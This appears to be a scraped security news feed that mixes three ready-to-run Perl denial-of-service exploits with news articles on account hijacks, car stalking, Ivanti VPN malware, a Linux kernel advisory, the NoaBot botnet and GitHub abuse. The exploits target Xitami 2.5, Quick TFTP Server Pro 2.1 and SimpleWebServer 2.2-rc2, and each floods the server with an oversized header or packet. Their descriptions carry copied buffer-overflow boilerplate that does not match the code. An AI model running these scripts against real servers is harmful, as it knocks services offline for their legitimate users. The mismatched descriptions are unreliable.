Xitami version 2.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 14 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1Uw9fCQ9T3IBqn53pS2lETUCM6zzYDSb8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=tutFcL3Gh8I

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5 Denial Of Service

The US Securities and Exchange Commission and security firm Mandiant both had their X accounts breached, possibly due to changes to X’s two-factor authentication settings. Here’s how to fix yours.

This week, the United States Securities and Exchange Commission (SEC) suffered an embarrassing—and market-moving—breach in which a hacker gained access to its X social media account and published fake information about a highly anticipated SEC announcement related to bitcoin. The agency regained control of its account and deleted the post in under an hour, but the situation is troubling, especially given that the prominent and well-respected security firm Mandiant, which is owned by Google, had its X account compromised in a similar incident last week.

Details are still emerging about exactly what happened in each case, but there are common threads that made the account takeovers possible—and there are ways to protect yourself.

Crucially, both accounts had the digital protection known as “two-factor authentication” disabled at the time of the takeovers. Also known as 2FA, the defense requires a rotating numeric code or physical dongle in addition to a person's login credentials, so everything isn't resting on just a username and password. The SEC has not yet said whether it had two-factor turned off accidentally as a result of X's February 2023 policy change, which made it so only accounts paying for a Blue subscription would have access to two-factor codes sent via text message. Mandiant implied on Wednesday that this change was the reason it did not have the protection turned on for its X account, saying, “Normally, 2FA would have mitigated this, but due to some team transitions and a change in X’s 2FA policy, we were not adequately protected.”

Mandiant said hackers were able to guess the password protecting its X account in “a brute force” attack. X itself said on Tuesday that the SEC account hack was the result of “an unidentified individual obtaining control over a phone number associated with the @SECGov account through a third party.”

The two incidents lay out a punch list of the most important steps you can take to lock down your X account. First, ensure that your account is protected by a strong, unique password. Second, turn on two-factor for your account or, if you think you already have it on, check to make sure. X’s move to make people pay for a basic form of two-factor is problematic. It also created confusion because the company prompted free users to switch away from SMS two-factor, but then seemingly simply turned off the protection altogether for those who didn’t. This likely left a group of users in a situation where they think they have two-factor authentication on, but actually don’t.

To confirm that you have two-factor on, or to enable it for the first time, log into your X account, go to **Settings and privacy**, then **Security and account access**, **Security**, and then **Two-factor authentication**. (You can also click here if you're already logged into X). On that screen, you can choose between using two-factor authentication with a code-generating app or a physical security key. You can also generate backup codes for your account to log in to X even if you lose access to your second factor.

Finally, check that there isn't a phone number linked to your X account that can be used for account recovery. Twitter uses phone numbers to “verify” high-profile accounts and also offers a feature called “Additional password protection,” through which “you must provide either the phone number or email address associated with your account in order to reset your password.” It seems, though, that by having a phone number associated with its X account, the SEC was putting itself at greater risk, because attackers could gain control of the account by first taking over the associated phone number using an attack known as a SIM swap.

“Remove your phone number from Twitter altogether to ensure you avoid the SIM-swap threat with Twitter's risky text-message-based password reset flow,” says Rachel Tobac, a longtime account compromise researcher and CEO of SocialProof Security. She adds that X users should “turn on 2FA—I recommend app-based at the very least—and ensure you have a strong password on the account."

Though X has made it more convoluted to enable strong account security, it’s worth learning from the SEC and Mandiant’s mistakes.

How to Stop Your X Account From Getting Hacked Like the SEC's

The FCC wants car makers and wireless providers to make it harder for stalkers to use your car against you.

Most new model cars are not just cars anymore. With multiple digital systems, vehicles are increasingly plugged into web applications and digital processes. Some of them are basically smartphones on wheels.

Even if we assume these new features were all created with your convenience in mind, some of them can have some adverse effects on your privacy, and sometimes even your safety.

Addressing the use of connected cars to stalk, intimidate, and harass survivors of domestic violence, the Federal communications Commission (FCC) has issued a press release calling on carmakers and wireless companies to help ensure the independence and safety of domestic violence survivors.

Chairwoman Jessica Rosenworcel of the FCC said:

> “No survivor of domestic violence and abuse should have to choose between giving up their car and allowing themselves to be stalked and harmed by those who can access its data and connectivity.”

We have previously talked about cars spying on you, and the poor privacy policies that allow manufacturers to sell the data they gather for targeted advertising. We have also written about a federal judge that ruled it’s fine for car makers to intercept your text messages. But those are privacy concerns. Valid and serious, but on a different level from running the risk of being harassed by a jealous ex.

For readers focused on the privacy issues of connected cars, we can recommend the Mozilla report It’s Official: Cars Are the Worst Product Category We Have Ever Reviewed for Privacy. And when you are parting with a car in the US, you may want to look at the Privacy4Cars app that can provide a Vehicle Privacy Report and claims to be able to delete your data. You will need your Vehicle Identification Number (VIN).

The FCC also asked wireless service providers (AT&T, T-Mobile and Verizon) to describe their partnerships with car manufacturers, seeking information on how the wireless providers work with them and what their policies are for handling geolocation data provided by car manufacturers.

The FCC press release includes statistics showing that more than 12 million people each year are the victims of rape, physical violence, and stalking.

**Tips to keep a stalker from tracking your car**

Not all cars offer these options, and the tips may not apply to your situation, but here are some general tips for people that are afraid they are the target of a stalker:

*   Use the navigation app on your phone, rather than the one built into your car.
*   Do not store places you visit regularly in the car’s navigation.
*   Consider using a VPN when you connect to your car’s hotspot.
*   Find out which devices can access the car or its location data by using any “remote access” apps for the car and remove the devices that are not under your control.
*   Familiarize yourself with the car manufacturer’s privacy policy so you know where your data might be sent. To give you an idea, data might end up with advertisers, law enforcement, service providers, the car manufacturer and its dealers, tech giants like Apple, Google, and Amazon, connected service providers, and government agencies.
*   Keep the software updated to make sure your car is equipped with the latest protection against potential intrusions.
*   If the suspected stalker has been near your vehicle, inspect it thoroughly for trackers and other unfamiliar hardware.
*   Try not to travel alone and always park in a well-lit, busy area if you are concerned about your physical safety.
*   If you have a dashcam that uses cloud storage, check who has access to the images. They can be used to track your movements.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 FCC wants cars to make life harder for stalkers 

Quick TFTP Server Pro version 2.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 12 january 2024  
# Vendor Homepage: https://www.tallsoft.com/  
# Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Quick TFTP Server Pro 2.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=yz7_ImFYueA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to TFTP.  
#The following request sends a large amount of data to the TFTP to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $filename = "exploit";

$shell = "A"x317;

my $mode = "A" x 1360;

my $muha = "\x00\x02" .$filename . "\x00" .$mode;

socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";  
send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!";  

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Quick TFTP Server Pro 2.1 Denial Of Service

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.
"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an

Vulnerability / Threat Intelligence

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.

"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker **UNC5221**.

The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances.

Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment.

According to Ivanti, the intrusions impacted less than 10 customers, indicating that this could be a highly-targeted campaign. Patches for the two vulnerabilities (informally called ConnectAround) are expected to become available in the week of January 22.

Mandiant's analysis of the attacks has revealed the presence of five different custom malware families, besides injecting malicious code into legitimate files within ICS and using other legitimate tools like BusyBox and PySoxy to facilitate subsequent activity.

"Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said.

LIGHTWIRE is one of the two web shells, the other being WIREFIRE, which are "lightweight footholds" designed to ensure persistent remote access to compromised devices. While LIGHTWIRE is written in Perl CGI, WIREFIRE is implemented in Python.

Also used in the attacks are a JavaScript-based credential stealer dubbed WARPWIRE and a passive backdoor named ZIPLINE that's capable of downloading/uploading files, establishing a reverse shell, creating a proxy server, and setting up a tunneling server to dispatch traffic between multiple endpoints.

"This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released," Mandiant further added.

UNC5221 has not been linked to any previously known group or a particular country, although the targeting of edge infrastructure by weaponizing zero-day flaws and the use of compromise command-and-control (C2) infrastructure to bypass detection bears all the hallmarks of an advanced persistent threat (APT).

"UNC5221's activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors," Mandiant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families

SimpleWebServer version 2.2-rc2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 11 january 2024  
# Vendor Homepage:  http://www.pmx.it/  
# Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSimpleWebServer 2.2-rc2   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=YFfBuWnHeQY

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

our $exploit = "\x41"x2014;

$exploit     = "x\41"x2104;

if ($socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "TCP"))  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";  
        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $ip failed!\n";  
    exit;  
}

              print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                        ,,__  
              ..  ..   / o._)           
             /--'/--\  \-'||    
            /        \_/ / |    
          .'\  \__\  __.'.'     
            )\ |  )\ |        
           // \\ // \\  
          ||_  \\|_  \\_  
          '--' '--'' '--'  

                [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

SimpleWebServer 2.2-rc2 Denial Of Service

Ubuntu Security Notice 6549-5 - It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel did not properly initialize a policy data structure, leading to an out-of-bounds vulnerability. A local privileged attacker could use this to cause a denial of service or possibly expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6549-5  
January 10, 2024

linux-gcp-5.15, linux-intel-iotg-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms

Details:

It was discovered that the USB subsystem in the Linux kernel contained a  
race condition while handling device descriptors in certain situations,  
leading to a out-of-bounds read vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-37453)

Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel did not properly initialize a policy data structure, leading  
to an out-of-bounds vulnerability. A local privileged attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information (kernel memory). (CVE-2023-3773)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate some attributes passed from userspace. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly expose sensitive information (kernel memory). (CVE-2023-39189)

Sunjoo Park discovered that the netfilter subsystem in the Linux kernel did  
not properly validate u32 packets content, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39192)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate SCTP data, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39193)

Lucas Leong discovered that the Netlink Transformation (XFRM) subsystem in  
the Linux kernel did not properly handle state filters, leading to an out-  
of-bounds read vulnerability. A privileged local attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-39194)

It was discovered that a race condition existed in QXL virtual GPU driver  
in the Linux kernel, leading to a use after free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-39198)

Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did  
not properly handle socket buffers (skb) when performing IP routing in  
certain circumstances, leading to a null pointer dereference vulnerability.  
A privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-42754)

Jason Wang discovered that the virtio ring implementation in the Linux  
kernel did not properly handle iov buffers in some situations. A local  
attacker in a guest VM could use this to cause a denial of service (host  
system crash). (CVE-2023-5158)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel  
did not properly handle queue initialization failures in certain  
situations, leading to a use-after-free vulnerability. A remote attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5178)

Budimir Markovic discovered that the perf subsystem in the Linux kernel did  
not properly handle event groups, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-5717)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1046-intel-iotg  5.15.0-1046.52~20.04.1  
   linux-image-5.15.0-1048-gcp     5.15.0-1048.56~20.04.1  
   linux-image-gcp                 5.15.0.1048.56~20.04.1  
   linux-image-intel               5.15.0.1046.52~20.04.36  
   linux-image-intel-iotg          5.15.0.1046.52~20.04.36

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6549-5  
   https://ubuntu.com/security/notices/USN-6549-1  
   CVE-2023-37453, CVE-2023-3773, CVE-2023-39189, CVE-2023-39192,  
   CVE-2023-39193, CVE-2023-39194, CVE-2023-39198, CVE-2023-42754,  
   CVE-2023-5158, CVE-2023-5178, CVE-2023-5717

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1048.56~20.04.1

 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1046.52~20.04.1

Ubuntu Security Notice USN-6549-5

By Waqas
Mandiant had its X account (formerly Twitter) hacked on January 3rd, 2024.
This is a post from HackRead.com Read the original post: Mandiant: X Account Hacked in Brute-Force Attack Linked to ClinkSink Campaign

Mandiant’s investigation unveiled that the attack was part of a larger operation known as “ClinkSink,” which employed a “Drainer-as-a-Service” (DaaS) model to steal Solana cryptocurrency.

Mandiant, a renowned cybersecurity firm and Google subsidiary found itself facing the very threat it combats on January 3rd, 2024. In an ironic twist, Mandiant’s own X account (formerly Twitter) was compromised through a brute-force attack, highlighting the ever-present vulnerability of even the most well-defended systems.

Hacked X account of Mandiant (Hackread.com)

****The Breach: Phishing for Profits****

The attacker, leveraging a brute-force method, cracked Mandiant’s X account password and gained access. With control in hand, the perpetrator swiftly transformed the account into a malicious tool, spewing links to a cleverly disguised phishing webpage.

This page mimicked a legitimate X login portal, luring unsuspecting users to enter their credentials. Upon entering their information, users were unknowingly redirected to a hidden page that would siphon their cryptocurrency funds if signed in – a digital heist unfolding right under the noses of cybersecurity experts.

> _“On January 3, 2024, Mandiant’s X social media account was taken over and subsequently used to distribute links to a cryptocurrency drainer phishing page. Working with X, we were able to regain control of the account and, based on our investigation over the following days, we found no evidence of malicious activity on, or compromise of, any Mandiant or Google Cloud systems that led to the compromise of this account.”_
> 
> Mandiant

****ClinkSink: The Drain Behind the Curtain****

In a commendable display of transparency, Mandiant publicly acknowledged the breach and shared its findings in a detailed blog post published on Wednesday 11, 2024. The cybersecurity giant revealed that a “weak password” was the likely culprit, emphasizing the importance of password best practices. Additionally, they confirmed that only their X account was compromised and no other systems were breached.

Mandiant’s investigation also revealed the attack was part of a larger operation dubbed “ClinkSink.” This campaign utilized a “Drainer-as-a-Service” (DaaS) model, where pre-built phishing kits and tools are readily available for purchase by cyber criminals. ClinkSink specifically targeted owners of Solana cryptocurrency, a popular blockchain platform.

According to the company, so far, malicious threat actors have stolen hundreds of thousands of dollars worth of Solana cryptocurrency assets in the recent ClinkSink drainer campaigns.

A Telegram channel part of the ClinkSink attack campaign (Screenshot: Mandiant)

****A Defender Breached: Lessons Learned****

While Mandiant eventually regained control of its X account and the immediate threat was neutralized, the incident served as a harsh reality check and points out several crucial cybersecurity lessons:

*   **No one is invincible:** Even the most secure systems are vulnerable to determined attackers.
*   **Password hygiene is paramount:** Strong, unique passwords and robust two-factor authentication are essential defence mechanisms.
*   **Vigilance is key:** Constant monitoring and quick response are crucial in mitigating damage from cyberattacks.

Nevertheless, this is not the first time that a cybersecurity firm fell prey to hackers or was targeted by malicious threat actors. In March 2023, a Swiss technology and cybersecurity company, Acronis, experienced a data breach, with over 21 GB of files and folders being leaked by a hacker known as Kernelware.

In February 2023, the Singapore-based Group-IB cybersecurity firm revealed that it has been constantly targeted by malicious threat actors based in the People’s Republic of China. In February 2021, the French cybersecurity company Stormshield suffered a data breach in which its source code and customer data were stolen by unknown hackers.

****_RELATED ARTICLES_****

Mandiant: X Account Hacked in Brute-Force Attack Linked to ClinkSink Campaign

By Deeba Ahmed
Another day, another malware threat against Linux systems!
This is a post from HackRead.com Read the original post: Mirai-based NoaBot Botnet Targeting Linux Systems with Cryptominer

A noticeable difference between NoaBot and Mirai is that rather than DDoS attacks, the botnet targets weak passwords connecting SSH connections to install cryptocurrency mining software.

Cybersecurity researchers at Akamai have discovered cryptomining malware called NoaBot based on the notorious **Mirai botnet**. The crytojacking malware NoaBot is currently targeting Linux servers and has been active since January 2023.

According to Akamai, a noticeable difference between NoaBot and Mirai is that rather than **DDoS attacks** (Distributed Denial of Service attacks), the malware targets weak passwords connecting SSH connections and installs cryptocurrency mining software, allowing attackers to generate digital coins using victims’ computing resources, electricity, and bandwidth.

Here, it is important to mention that NoaBot malware has also been used to deliver **P2PInfect**, a separate worm discovered by Palo Alto Networks in July 2023.

NoaBot is compiled using the UClibc code library, unlike the standard Mirai library. This changes how the antivirus protections detect NoaBot, categorizing it as an SSH scanner or generic trojan. The malware is statically compiled and stripped of symbols, while strings are obfuscated instead of saved as plaintext, making it harder for reverse engineers to extract details.

The NoaBot binary runs from a randomly generated folder, making searching devices harder. The standard Mirai dictionary is replaced with a large one, and a custom-made SSH scanner is used. Post-breach capabilities include installing a new SSH-authorized key.

This botnet has grown significantly, with over 800 unique IP addresses worldwide showing signs of NoaBot infections. The worm is a **customized version of Mirai**, a malware that infects Linux-based servers, routers, web cameras, and other Internet of Things devices.

Interestingly, the malware includes embedded song lyrics from the “**Who’s Ready for Tomorrow**” song by Rat Boy and IBDY, but later samples do not have these. The botnet also adds command line arguments, such as the “noa” flag, which installs a persistence method after a reboot.

Screenshot: Akamai

Screenshot: Akamai

Threat actors modified the **XMRig miner** to extract the mining configuration before execution. The miner’s functions involve function calls and signals. The configuration contains the mining pool and wallet address details. However, IDA misses the binary name and pool IP placeholder, allowing attackers to estimate the profitability of the cryptomining gig.

Researchers noted that the attackers were running their private pool instead of a public one, eliminating the need for a wallet. However, domains are no longer resolvable with Google’s DNS, and no recent incidents involving the dropping of the miner are noticed, suggesting the threat actors may have halted the campaign for better opportunities.

Hackread has been following incidents involving Mirai since it was **discovered** in 2016. Mirai is a self-replicating malware targeting Linux-based IoT devices, used to infect other vulnerable devices.

In 2016, it was used in a massive **DDoS attack against Dyn DNS**, paralyzing the internet. The creators released the source code, allowing crime groups to incorporate it into their attacks. Mirai scans the internet for Telnet connections via infected devices to crack Telnet passwords, then targets additional devices using the same technique.

**Akamai urges** Linux server administrators to protect their systems from NoaBot by keeping software updated, using strong passwords, enabling two-factor authentication, and monitoring unauthorized activity. This is crucial as NoaBot can launch DDoS, data breaches, and **cryptojacking attacks**.

****_RELATED ARTICLES_****

1.  **Hackers behind Mirai botnet & DYN DDoS attacks plead guilty**
2.  **Hackers behind Mirai botnet to avoid jail for working with the FBI**
3.  **Tiny Mantis Botnet Can Launch Powerful DDoS Attacks Than Mirai**
4.  **Reaper malware outshines Mirai; hits millions of IoT devices worldwide**
5.  **Mirai Variant ‘OMG’ Turns IoT Devices into Proxy Servers for Cryptomining**

Mirai-based NoaBot Botnet Targeting Linux Systems with Cryptominer

The ubiquity of GitHub in information technology (IT) environments has made it a lucrative choice for threat actors to host and deliver malicious payloads and act as dead drop resolvers, command-and-control, and data exfiltration points.
“Using GitHub services for malicious infrastructure allows adversaries to blend in with legitimate network traffic, often bypassing traditional security

Cybersecurity / Software Security

The ubiquity of GitHub in information technology (IT) environments has made it a lucrative choice for threat actors to host and deliver malicious payloads and act as dead drop resolvers, command-and-control, and data exfiltration points.

"Using GitHub services for malicious infrastructure allows adversaries to blend in with legitimate network traffic, often bypassing traditional security defenses and making upstream infrastructure tracking and actor attribution more difficult," Recorded Future said in a report shared with The Hacker News.

The cybersecurity firm described the approach as "living-off-trusted-sites" (LOTS), a spin on the living-off-the-land (LotL) techniques often adopted by threat actors to conceal rogue activity and fly under the radar.

Prominent among the methods by which GitHub is abused relates to payload delivery, with some actors leveraging its features for command-and-control (C2) obfuscation. Last month, ReversingLabs detailed a number of rogue Python packages that relied on a secret gist hosted on GitHub to receive malicious commands on the compromised hosts.

While full-fledged C2 implementations in GitHub are uncommon in comparison to other infrastructure schemes, its use by threat actors as a dead drop resolver – wherein the information from an actor-controlled GitHub repository is used to obtain the actual C2 URL – is a lot more prevalent, as evidenced in the case of malware like Drokbk and ShellBox.

Also rarely observed is the abuse of GitHub for data exfiltration, which, per Recorded Future, is likely due to file size and storage limitations and concerns around discoverability.

Outside of these four main schemes, the platform's offerings are put to use in various other ways in order to meet infrastructure-related purposes. For instance, GitHub Pages have been used as phishing hosts or traffic redirectors, with some campaigns utilizing a GitHub repository as a backup C2 channel.

The development speaks to the broader trend of legitimate internet services such as Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, Trello, and Discord being exploited by threat actors. This also includes other source code and version control platforms like GitLab, BitBucket, and Codeberg.

"There is no universal solution for GitHub abuse detection," the company said. "A mix of detection strategies is needed, influenced by specific environments and factors such as the availability of logs, organizational structure, service usage patterns, and risk tolerance, among others."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google